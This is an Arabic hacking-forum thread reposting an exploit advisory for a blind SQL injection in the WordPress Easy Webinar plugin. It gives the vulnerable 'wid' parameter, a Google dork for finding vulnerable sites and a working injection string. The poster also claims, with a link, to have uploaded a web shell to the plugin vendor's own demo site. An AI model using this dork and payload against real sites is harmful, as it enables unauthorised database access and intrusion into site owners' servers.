Follow us on Twitter Follow us on Facebook Watch us on YouTube





العودة   development-point > [ أقسام حماية واختراق المواقع والسيرفرات ] > قسم اختراق المواقع والسيرفرات > قسم الثغـرات
تحديث الصفحة Wordpress Easy Webinar Plugin Blind SQL
التسجيل التعليمـــات التقويم مشاركات اليوم البحث


Wordpress Easy Webinar Plugin Blind SQL

# Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability # Vendor Homepage: www.easywebinarplugin.com # Date: 10/26/2012 # Author: Robert Cooper (robert.cooper areyousecure.net)

 
 
أدوات الموضوع انواع عرض الموضوع
السابق المشاركة السابقة   المشاركة التالية التالي
قديم منذ /11-29-2012, 06:37 PM   #1
Mr iNFiNiTi
Creator

الصورة الرمزية Mr iNFiNiTi

Mr iNFiNiTi غير متواجد حالياً

 رقم العضوية : 149
 تاريخ التسجيل : Nov 2012
 العمر : 34
 الجنس : ~ ذكر
 البلد : SauDi
 المشاركات : 94
 إهتمامك : Hacking
 النقاط : 23
 قوة التقييم : Mr iNFiNiTi is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي Wordpress Easy Webinar Plugin Blind SQL

كود:




		border: 1px inset;
		width: 640px;
		height: 482px;
		text-align: left;
		overflow: auto"># Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability 
# Vendor Homepage: www.easywebinarplugin.com
 
# Date: 10/26/2012
 
# Author: Robert Cooper (robert.cooper [at] areyousecure.net)
 
# Tested on: [Linux/Windows 7]
 
#Vulnerable Parameters: wid=
 
 
# Google Dork: allinurl: get-widget.php?wid=
 
##############################################################
Exploit:
 
www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=[SQLi]
 
Note: The HTTP response will read 404, but this is false:
 
www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=3' or 'x'='x
 
This will result in the page loading correctly and show that the plugin is vulnerable to injection (string).
##############################################################
 
www.areyousecure.net
 
# Shouts to the Belegit crew

شل على موقع الاضافة من رفعي Wordpress Easy Webinar Plugin Blind SQL SnipeR (29).gif

http://demo.easywebinarplugin.com/wp...n/webadmin.php

المصدر: development-point - للمزيد تابع : قسم الثغـرات

Wordpress Easy Webinar Plugin Blind SQL
  رد مع اقتباس
 

مواقع النشر (المفضلة)

جديد قسم الثغـرات

« الموضوع السابق | الموضوع التالي »

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
الانتقال السريع

المواضيع المتشابهه للموضوع: Wordpress Easy Webinar Plugin Blind SQL
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
رفع شل على لوحه تحكم wordpress انس العوادي قسم اختراق المواقع والسيرفرات 15 09-04-2013 06:25 PM
ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities MhWy قسم الثغـرات 10 09-02-2013 02:21 AM
تخمين WordPress باستخدام مشروع Metasploit SnipeR قسم توزيعات أختبار الأخترآق المتقدم 1 08-30-2013 02:44 PM
حصريا Easy Driver Pro 8.0.3 ‏windows 8 الأرشيف 0 11-04-2012 07:40 PM
برنامج تغيير الاي بيHide IP Easy ,الشرح التفصيلى لعملاق تغيير الايبى Hide IP Easy v5.2.0.6 Final aaqassam جديد البرامج والتطبيقات 2 11-01-2012 07:08 PM


الساعة الآن 01:10 PM

 


الاتصال بنا - نقطة development-point - الأرشيف - بيان الخصوصية - الأعلى

Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
development-point
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47